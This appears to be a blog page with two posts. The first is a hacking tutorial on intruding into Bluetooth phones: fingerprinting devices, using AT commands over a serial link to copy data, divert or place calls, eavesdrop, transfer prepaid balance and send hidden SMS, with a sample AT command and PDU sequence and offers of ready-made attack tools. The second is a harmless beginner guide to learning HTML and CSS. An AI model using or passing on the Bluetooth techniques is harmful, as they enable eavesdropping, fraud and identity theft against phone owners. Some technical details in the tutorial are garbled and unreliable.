Bluetooth, as we all know is a method for wirelessly transmitting the data over networks. Nowadays, it’s more seen in mobile phones. In India after the Cell phone revolution almost all people are now switching over to Bluetooth enabled cell phones to make their lives easier by allowing free transmission of data in a comfortable range and gaming etc. to the owner.
It is relatively better than Infrared (the one in your TV remote), operates on low power, and is a low cost technology with no usage charges. So no reason that it won’T be popular!
However in the mind of a hacker the ways to intrude keep germinating. As I said nothing is unbreakable! Bluetooth too. So before this cranky lecture gets over your nerves, I start the real thing.
It has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted (“paired”) device that has since been removed from the trusted list. This data includes not only the phonebook and calendar, but media files such as pictures and text messages. In essence, the entire device can be “backed up” to an attacker’s own system.
A good attacker generally creates a serial profile connection to the device, for obtaining full access to the AT command set( the same commands that connect your modem the internet although different for BT phones), which can then be exploited using tools freely available online, such as PPP for networking and messaging, contact management(deletion and addition), diverts and initiating calls, connect to data services such as the Internet through GPRS, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the attacker can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, making the innocent owner’s incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim. Hackers are getting smart. So should be you
************************
NeverbeforeHacking Special
************************
He can even use that for transferring the balance on his cash card by transferring it from yours! (This is the exploit I discovered recently in the biggest GSM company in India while I was playing around with Bluetooth)
Sounds scary!
It is!
Bluetooth devices are classified among three classes
Class 1 – Range=high, up to 100 meters
Class 2 – Range=Medium, up to 10 meters
Class 3 – Range =low, very much within 10
We are dealing with Class 2 and 3 devices.
Every Bluetooth-enabled device has some characteristics that are either unique (Bluetooth device address), manufacturer specific (the first part of the Bluetooth device address) or model-specific (service description records).
Bluetooth Device Address
Bluetooth device address is something like IP address, unique for each device set. This address consists out of 6 bytes (looks like MAC addresses MM:MM:MM:XX:XX:XX). This address can also be understood as hardware address that is written in the ROM in the chipset of the device. The first three bytes of this address (the M-bytes in the above notation sample) tell us about the manufacturer of the Device. This is the first step to know about the device’s properties . @stake’s redfang tool does this. Unfortunately, it is not possible to tell upon the number range of the address part of the device address (the X-bytes in the above notation sample) which model it is.
Service Discovery Protocol Records
Each Bluetooth device that accepts communication from other Bluetooth devices announces its offered services through a service discovery protocol (SDP) Its like a profile of the device. So, remote devices can query devices upon the offered capabilities. SDP records are returned to the querying device and hold information on how to access the respective service. My method now hashes certain values from the SDPs and generates a unqiue fingerprint value that is then used to refer to a certain phone model.
Take a look at this SDP
Service Name: OBEX Object Push
Service Handle: 000x10c
Service Class ID list:
“OBEX Object Push (0001cx)
Protocol Descriptor list:
(0×0100)
Channel:9
Version:0×100
/ from Nokia 6310i
Now the attacker will run “Blueprint software and obtain the following result:
00:60:57@2621543
Device: Nokia 6310i
Version: V 5.22 15-11-200x NP
Type: Mobile phone
Note: Vulnerable to Bluebug attack /* A type of attack
How the attack begins!
First step is to scan all the devices in the range of the phone (here I will limit my manual to mobile phones only) after know whom to bluejack/attack the hacker sends him a message using his Bluejack software on the phone.
This is normally only possible if the device is in “discoverable” or “visible” mode, but there are tools available on the Internet that allow even this safety to be bypassed easily.
I have written a program in Perl language for such intrusions. Use it to check your phone’s vulnerability to attacks. I will give you the source later in NH group.
How to send SMS from a hacked phone!
This technique can be used by the attacker to know your mobile phone number by sending SMS to himself. ( now you can think of the consequences, blackmailing etc) .
SMS messages can be sent by using SMS PDUs which are different for each company of the phone.
For Nokia PDU visit the German site www.nobbi.com . The sending of the SMS is not generally visible by the user of the attacked phone. Settings can be made for not generating the delivery reports on the phone. So it makes the sending completely hidden for the hacker
AT commands:
AT+CMGF=0 //Set PDU mode AT+CSMS=0 //Check if modem supports SMS commands AT+CMGS=23 //Send message, 23 octets (excluding the two initial zeros) >0011000B916407281553F80000AA0A
E8329BFD4697D9EC37There are 23 octets in this message (46 ‘characters’). The first octet (“00″) doesn’t count, it is only an indicator of the length of the SMSC information supplied (0). The PDU string consists of the following
In the same way a call can be initiated on the hacked phone using AT commands that are freely available on net.
This is how one can start from the scratch and easily attack anyone in the range having a BT enabled phone.
For newbies and script kiddies I have few assorted tools in .SIS format that will do the needful for them. You can have the full package in the NH files section!
But its’ always advisable to try out the real programming as it turns on the real hacking spirit in you.
That is all for now, hope you liked this manual. Till the next update,I bid a bye!
Anirudh Sharma
anirudh@bluesprint.com
Doubts and queries are welcome in the group discussion boards!
To receive tutorials written by Anirudh on everything that puzzled you in your Inbox, join his group
Recommended
http://www.swedetrack.com/usblue4.htm 
More aboutBluetooth Intrusion Demystified

Create your own website using html, CSS, PHP

Posted by MUKESH KUMAR


Are you fascinated by the Koooool,funky,beautiful websites of your friends or the others that you find on the web….??? Do you want design websites like them..??? if your answer to the above questions is yes then this post is for you.
I’m not going to teach you html starting from the <head> tag. There are many websites that teach you HTML. This post will just guide you on where to begin and give links to the resources available on net. If you have any problem in learning html you can always contact me by dropping in a comment.
What softwares do i need to learn web designing??????
You don’t need any additional software to learn html, all you need is a browser to check the html pages you created and a text editor to write the code for the pages you can write the code in notepad. Even though notepad does the job for us i suggest you to download a good html editor that shows html tags in different colors. You can try coffee cup editor or ACE html editor, ACE is a completely free software. You can easily find them by googling.
Best websites for learning HTML:
W3SCHOOLS is the best website to web designing, every thing is available there. First complete their tutorials on html once you are done with it go for CSStutorials in w3 schools itself. After completing these tutorials you will get an idea of what each tag does and how to play with them to create funky web pages.When ever you find a good web page check the source of it. You can check the source by right clicking on the page and the selecting view source/page source, if you are using mozilla you can get the code by pressing Ctr+U.
Do i need to design my website from scratch..????
You need not design your website from scratch. There are many open source web designs available on net you can choose any one of them as you base design and then modify them according your needs with the knowledge you got from the HTML and CSS tutorials in W3SCHOOLS.Here are few links to sites that give you open source web templates.
www.OpenWebdesign.Org
If you want to create dynamic websites you need to learn some server side scripting languages like PHP, Python. I will post about installing a web server on your computer in a few days.If you have any problems in web designing you can always drop them here, I will reply you as soon as possible
Gud luck

More aboutCreate your own website using html, CSS, PHP